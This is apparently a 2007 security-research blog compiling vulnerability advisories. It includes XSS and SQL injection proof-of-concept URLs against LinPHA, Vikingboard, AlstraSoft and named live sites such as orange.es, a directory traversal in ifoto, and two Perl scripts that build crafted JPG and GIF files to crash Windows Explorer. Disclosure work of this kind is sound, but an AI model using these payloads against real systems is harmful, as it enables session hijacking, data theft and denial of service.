LINPHA 1.3.1 Multiple Scripts XSS

Friday, September 07, 2007
##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url: http://linpha.sourceforge.net
Advisory: http://lostmon.blogspot.com/2007/09/linpha-131-multiple-scripts-xss.html
vendor informed: NO    exploit available: YES
##########################################


LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures.


LinPHA contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not validate multiple parameters upon submission to multiple scripts.
This allows an attacker to craft a URL that executes arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.


################
Versions
################

LinPHA 1.3.1

################
Timeline
################

Discovered: 05-08-2007
Disclosure: 07-09-2007

###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600

http://localhost/linpha/search.php?1=1&pn=2"><script>alert()</script>#tn

http://localhost/linpha/viewer.php?album=etc/passwd"><body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&order="><body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&imgid=14013"><body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?search_text=a&order="><body><script>alert()</script><h1>lalala</h1></body>

Some other parameters and scripts are affected...

###################### €nd ###############################

Thanks to estrella for being my light
Thanks to all Lostmon's Group Team


Ya.com suffers from XSS holes

Thursday, August 30, 2007
###################################
Ya.com suffers from XSS holes
###################################

The Ya.com website is affected by cross-site scripting
vulnerabilities.

The holes are located under the subdomain
acceso.ya.com and likewise on corp.ya.com

Besides the ones mentioned here as proof of
concept, there are some more in other dynamic
areas of the portal.

After trying several times to contact ya.com,
at first it was impossible, since the only way to
contact them on their website is by telephone, and I am not
willing to spend my money to report flaws in their website; so
I was forced to send emails at random
to seguridad, security, etc. @ya.com to see whether
by luck any of them existed, which I see they don't,
as I got no reply, or else they simply ignore them...

Some examples of this exploitation:

https://acceso.ya.com/ayuda/searchfunc.html?si=html
&co=20&sw=[XSS-CODE]&Submit=Buscar


http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas

http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]

##################### €nd ###########################

Thnx to estrella for being my light.
Thnx to all Lostmon Team !!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what makes the mind move....

Windows Extended file attributes buffer overflow Study II

Thursday, August 09, 2007
##########################################################
Windows Extended file attributes buffer overflow Study II
Original:
##########################################################

In a previous article, I wrote about extended file
attributes:

"A local buffer overflow exists in the Windows Explorer.
The extended file attributes functions have a small buffer
size in 'FileAllInformation(), FileNameInformation' and
other subfunctions in undocumented functions of NTDLL,
resulting in a buffer overflow, with an unknown impact."

Original article:

http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html

I wrote "this issue could be done in all files"...

Now I am going to extend some more details of my investigation
and research into this issue.

Look at the new vulnerabilities in Microsoft Windows GDI and ole32:

http://www.securityfocus.com/bid/16167
http://www.securityfocus.com/bid/25207
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887

All the PoCs and exploits have some details worth studying.

In every case Explorer crashes when it tries to read the
extended file attributes of the crafted file (*.jpg, *.doc, *.gif, *.wmf).
How to demonstrate it?

All the exploits have some similarities....
All the crafted files crash at the same point, or on the same properties.
This is a little test/study of those exploits/vulnerabilities.


############################################
Testing with filemon and EFA.vbs
############################################


####################
Exploit wmf File
####################

Download the BID 16167 exploit and unzip it in c:\test

Open filemon, include the process explorer.exe
and click Apply.
Now open c:\test\ and when Explorer reads the EFA for the wmf
file, it crashes, or when you put the mouse over it...

When the crash occurs, filemon shows something similar to the
screenshot in the original post: filemon marks the overflow in
the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to read extended attribute number 9 (Author).

Delete the test file from a DOS command line :)

####################
Exploit jpg file
####################

Download the BID 25207 exploit and unzip it in c:\test

Open filemon, include the process explorer.exe
and click Apply.
Now open c:\test\ and when Explorer reads the EFA for the jpg
file, it crashes, or when you put the mouse over it...

When the crash occurs, filemon shows something similar to the
screenshot in the original post: filemon marks the overflow in
the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to read extended attribute number 9 (Author).

Delete the test file from a DOS command line :)

###################
exploit Gif file
###################

Save the exploit for the Gif file in c:\test

Open filemon, include the process explorer.exe
and click Apply.
Now open c:\test\ and when Explorer reads the EFA for the gif
file, it crashes, or when you put the mouse over it...

When the crash occurs, filemon shows something similar to the
screenshot in the original post: filemon marks the overflow in
the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to read extended attribute number 9 (Author).

Delete the test file from a DOS command line :)

###################
Exploit Doc file
###################

Unzip explorer_crasher.doc in c:\test\
Open filemon, include the process explorer.exe
and click Apply.
Now open c:\test\ and when Explorer reads the EFA for the doc
file, it crashes, or when you put the mouse over it...

When the crash occurs, filemon marks the
overflow in the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to read extended attribute number 9 (Author).

Delete the doc file from a DOS command line :)
#################################
LINKS AND FILES NEEDED
#################################

For testing this you need all the exploits, filemon and EFA_test.vbs.

Download filemon :

http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

Download Exploit Word file DoS :

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

Download exploit BID 16167:

http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar

Exploit BID 25207 :
########################################################
#!/usr/bin/perl

#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans

print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

##########################################################


Save the Gif file gdi32.dll DoS:

##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";

# milw0rm.com [2007-07-23]
########################################################
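The PoC byte strings above, whatever extension they are given, start with the 18-byte WMF METAHEADER layout (mtType, mtHeaderSize = 9, mtVersion = 0x0300, mtSize, mtNoObjects, mtMaxRecord, mtNoParameters) followed by META_CREATEBRUSHINDIRECT, META_CREATEPENINDIRECT and META_EOF records, which fits the observation that every crafted file crashes at the same place. The following Python triage parser is an added example, not code from this post or from the exploit authors: it decodes that header and record list from a constructed copy of the JPG PoC bytes and from a stand-in for the GIF PoC (same header and records, with its 0x99 filler region replaced by plain 0x99 bytes of equal length) and reports the inconsistencies a defender can key on.

```python
import struct
from collections import namedtuple

# Field layout of the 18-byte WMF METAHEADER (all fields little-endian).
MetaHeader = namedtuple(
    "MetaHeader",
    "mt_type header_size version size_words no_objects max_record no_params")
META_EOF = 0x0000
# The two record types both PoCs use; each adds an entry to the object table.
OBJECT_CREATORS = {0x02FA: "META_CREATEPENINDIRECT",
                   0x02FC: "META_CREATEBRUSHINDIRECT"}

# Bytes the JPG PoC script above writes, re-assembled here as hex (constructed copy).
JPG_POC = bytes.fromhex(
    "0100090000032200000072657a612e65"
    "784507000000fc020000000000000000"
    "08000000fa0200000000000000000000"
    "07000000fc0208000000000000800300"
    "00000000")
# First 80 bytes of the GIF PoC: disk-metafile header, same records, zero padding.
GIF_HEAD = bytes.fromhex(
    "02000900000322000000060706060664"
    "2d4907000000fc020000000000000000"
    "08000000fa0200000000000000000000"
    "07000000fc0208000000000000800300"
    "00000000000000000000000000000000")
# Stand-in for the full GIF PoC (constructed): its 168-byte filler region is
# replaced by plain 0x99 bytes of the same length (the parser never interprets
# that region), then the 80-byte head is repeated exactly as the script does.
GIF_LIKE = GIF_HEAD + b"\x99" * 168 + GIF_HEAD


def parse_header(data):
    """Decode the METAHEADER; raises if the buffer is too short to hold one."""
    if len(data) < 18:
        raise ValueError("shorter than a WMF METAHEADER")
    return MetaHeader(*struct.unpack_from("<HHHIHIH", data, 0))


def parse_records(data, offset=18):
    """Walk records (4-byte size in words, 2-byte function code, parameters)
    until META_EOF. Returns (records, offset just past the last record parsed)."""
    records = []
    while offset + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, offset)
        end = offset + size_words * 2
        if size_words < 3 or end > len(data):
            records.append((offset, func, None))  # malformed record: stop here
            return records, offset
        records.append((offset, func, data[offset + 6:end]))
        offset = end
        if func == META_EOF:
            break
    return records, offset


def triage(name, data):
    """Parse a file as WMF and list the inconsistencies worth flagging."""
    hdr = parse_header(data)
    records, end = parse_records(data)
    findings = []
    if hdr.header_size != 9 or hdr.version not in (0x0100, 0x0300):
        findings.append("header fields do not match a standard METAHEADER")
    ext = name.rsplit(".", 1)[-1].lower()
    if ext != "wmf":
        findings.append(f"WMF content with .{ext} extension")
    declared = hdr.size_words * 2
    if declared != len(data):
        findings.append(f"mtSize declares {declared} bytes, file is {len(data)}")
    creators = sum(1 for _, func, _ in records if func in OBJECT_CREATORS)
    if hdr.no_objects > creators:
        findings.append(f"mtNoObjects={hdr.no_objects} but only {creators} "
                        "object-creating records")
    if end < len(data):
        findings.append(f"{len(data) - end} trailing bytes after META_EOF")
    return hdr, records, findings


if __name__ == "__main__":
    for name, data in (("something.jpg", JPG_POC), ("Art.gif", GIF_LIKE)):
        hdr, records, findings = triage(name, data)
        print(f"{name}: mtType={hdr.mt_type} mtNoObjects={hdr.no_objects}")
        for offset, func, params in records:
            label = OBJECT_CREATORS.get(
                func, "META_EOF" if func == META_EOF else hex(func))
            print(f"  @{offset:3d} {label} params={params.hex() if params else ''}")
        for finding in findings:
            print("  !", finding)
```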

Save EFA_test.vbs:

#######################
EFA_test.vbs
########################

' Enumerate the Explorer column headers (0..34) for C:\test, then read every
' property of every file in the folder, which is what Explorer does when it
' shows a file's extended attributes; the crash occurs on property 9 (Author).
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
' Calling GetDetailsOf with the Items collection returns the column name
For i = 0 to 34
    arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
' Ask the shell for each property of each file in the folder
For Each strFileName in objFolder.Items
    For i = 0 to 34
        Wscript.Echo i & vbtab & arrHeaders(i) _
            & ": " & objFolder.GetDetailsOf(strFileName, i)
    Next
Next
#########################################################

######################## €nd #########################

Thnx to estrella for being my light
Thnx to FalconDeOro; he investigated and documented this issue with me.
Thnx to Icaro and the Badchecksum Team for their interest in the research.
Thnx to Jkouns and Jericho for their patience.
Thnx to all OSVDB manglers; they are involved in a very nice project.
Thnx to the Secunia Research Team; they do very good co-work with researchers.
Thnx to all Lostmon's Group Team

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Google custom search engine contributors invite XSS

Tuesday, August 07, 2007
#####################################################
Google custom search engine contributors invite XSS
Vendor url: http://www.google.com
Product Url: http://www.google.com/coop/cse/
Advisory url:http://lostmon.blogspot.com/2007/08/
google-custom-search-engine.html
Vendor notify :yes vendor confirmed: yes Fixed: YES
#####################################################

Description:

A Custom Search Engine is a tailored search experience,
built using Google's core search technology, which
prioritizes or restricts search results based on websites
and pages that you specify, and which can be tailored to
reflect your point of view or area of expertise.

Google Custom Search Engine has a flaw that allows a remote
cross-site scripting attack. This flaw exists because the
application does not validate the textarea when previewing
an invite. This could allow a user to create a specially
crafted invite that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.

################
timeline
###############

discovered: 31-07-2007
vendor notify: 31-07-2007
vendor response: 31-07-2007
vendor fix: 07-08-2007 (I tested it today)
disclosure: 07-08-2007

####################
explanation
###################



Go to

http://www.google.com/coop/manage/cse/collaboration?cx=[token-of-search-engine]

and in 'Add a personal note to the invitation' write some JavaScript
or HTML code and then click on 'invite preview';
this code is executed...

The form also converts hex values with semicolons (HTML entity notation) to HTML:


It is transformed into HTML code, but it is not executed :)

We can also try converting it to decimal values, and it likewise shows the
HTML without executing it.
It only works with 'simple' HTML.

######################### €nd ########################

Thnx to estrella for being my light
Thnx to all Lostmon Team !!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Orange.es, Starmedia and latinchat vulnerable

Monday, August 06, 2007
#################################################
Orange.es, Starmedia and latinchat vulnerable to
Cross-site Scripting attacks.
Original article:http://lostmon.blogspot.com/
2007/08/orangees-starmedia-y-latinchat.html
#################################################

Several days ago I tried to get in touch with the
webmaster of both starmedia and orange to notify them
of a series of vulnerabilities in their pages. Up to
three e-mails on different dates without getting any
reply from the group.

These pages are affected by a vulnerability called
Cross site scripting, through which HTML or JavaScript
code can be executed in the security context between
the server and the client user.

So if you visit these pages and use their services,
be careful and check the URLs of theirs that you visit,
and that there is nothing strange in them.


###################################
On the domain: *.orange.es
###################################

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado"><script>
alert()</script>&xargs=&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen"><script>alert()</script>
&filtrofamiliar=Desactivado&xargs="&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=">
<script>alert()</script>&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=
"><script>alert()</script>

http://busca.orange.es/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=


http://busca.orange.es/search?buscar=todo+spice+girls
&first=&rbpref=pref&destino=web&filtrofamiliar=Activado
"><script>alert()</script>&xargs=&estat=

All the variables in the following URL are affected
except y, x, rbpref and slanguage.


http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&
iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&
inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers
=&slanguage=&rbpref=advanced&lang=&x=44&y=13

http://cine.orange.es/buscador/contenidos.html?&text=
%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E

http://cine.orange.es/encuestas/encuestas.html?id=3801
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/buscarForos?query=
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385&re="><script>alert()</script>

http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385"><script>alert()</script>&re=blah


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415
"><script>alert()</script> // without being logged in.

http://tonosdeespera.orange.es/RingBackTones/servlet/web/
TonosCategoria?identificador=5117154&TitCat=Pop+Rock+
Internacional"><script>alert()</script>

http://personales.orange.es/orange/site/siteBuscador?
palabras="><script>alert()</script>
&idcategoria=#busquedas


###################################
In their chats.
###################################

A private window can be opened without being in the chat,
and moreover the UserName parameter of the user we open the
private window to is also vulnerable:

http://disp011-org.orange.es/magma_qa/templates/T12/
0/privat.html?
UserName=Lostmon"><script>alert()</script>

http://dhtml.orange.es/magma_qa/templates/T12/R0/
showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&
InstanceID=R32_7-1&UserName=Lostmon

Moreover, the text boxes for entering text to send to the channel,
and the message box for the private window, also allow XSS code
to be sent; experimenting with the chats, it may likewise be possible
to send XSS code to the other users
(I have not tested it).


############################
Starmedia
##########################

As can be seen in the following URL, the case is the same
as on the orange.es domain.

The web structure follows the same pattern,
so we can assume it is the same type of system

and has the same vulnerabilities (and so it is).

http://busca.starmedia.com/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=

It is also affected in the same way, and since the chat (latinchat)
is the same type of system,
it has the same vulnerabilities too.



http://login04.latinchat.com/magma_qa/templates/modules/
result/T2.php?UserName=Lostmon"><script>
alert()</script>&InstanceID=R31_1-1

##################### €nd ##############################

Thnx to estrella for being my light
Thnx to all Lostmon team !

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Crashing Safari 3.0.3 for Windows Step by Step

Friday, August 03, 2007
A few days ago I published in my blog a guide
about how to crash Safari 3.0.2 step by step.


http://lostmon.blogspot.com/2007/07/
crashing-safari-302-for-windows-step-by.html


Apple intended to fix it in the next version or release, but today I tested
Safari for Windows 3.0.3 and this flaw
continues to exist in this version too :((

Another crash can be triggered when trying to print any document in Safari 3.0.3.

--
Sincerely:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)


--
Curiosity is what makes the mind move....

ifoto traversal folder enumeration

Wednesday, July 25, 2007
#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisory:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify: no exploit included: yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################


ifoto contains a flaw that allows remote traversal and
arbitrary folder enumeration. This flaw exists because the
application does not validate the 'dir' variable upon submission
to the 'index.php' script. This could allow a remote user to
create a specially crafted URL that uses '../'
directory traversal characters to view the folder
structure on the target system with the privileges
of the target web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify: ---
vendor response: ---
disclosure: 25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../


################# €nd ############################


--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Vikingboard multiple Cross site scripting

#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisory:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify: yes exploit included: yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################


Vikingboard is a PHP-based community board designed by
the principle of "less is more", and features a powerful
web-based extension system, a lightning-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not validate multiple parameters upon submission to multiple
scripts. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007


#####################
Examples
#####################


http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]

http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]


We can call the debug parameter to obtain sensitive information.


http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0

When sending a private message, the "Message Title" field is affected:

http://localhost/viking/cp.php?mode=6

We can send a PM with a malformed XSS title to other users,
and it is executed when the victim goes to the Inbox in his control panel:

http://localhost/viking/cp.php?mode=7&f=1

http://localhost/viking/report.php?p=2[XSS-CODE]


http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]

http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]

http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]

http://localhost/viking/search.php?search=user:administrator&act=dosearch

If the user has any script code in the first lines of any post,
when trying to find all posts by this user, the code is executed
when the application shows the results.

##################### €nd ##############################

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

Vikingboard debug information disclosure

#################################################
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisory:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify: yes exploit included: yes
#################################################


Vikingboard is a PHP-based community board designed by
the principle of "less is more", and features a powerful
web-based extension system, a lightning-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.

The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007


#####################
Examples
#####################


http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1

################# €nd ############################

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

AlstraSoft Multiple products multiple Vulnerabilities

Sunday, July 22, 2007
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor url:http://www.alstrasoft.com/products.htm
Advisory url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
BID:25022, 25023, 25026
####################################################



Multiple AlstraSoft products are vulnerable
to Cross site scripting and SQL injection style attacks.



################
examples
################

To exploit some of the flaws you need to log in.

#####################################
AlstraSoft Video Share Enterprise
#####################################


http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>

http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr

http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=

http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>

http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>

http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>


http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search

http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>


path disclosure:

http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>

http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>

http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'

http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>

http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>

SQL injection:

http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1

http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1



###########################################
AlstraSoft Text Ads Enterprise
###########################################

http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>

http://[Victim]/ads/search_results.php?query="><script>alert()</script>

http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>

http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>


#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################


http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>

http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit


#################################################
e-friends

http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>

This is a persistent XSS.


########################################
AlstraSoft Affiliate Network Pro
########################################

http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>

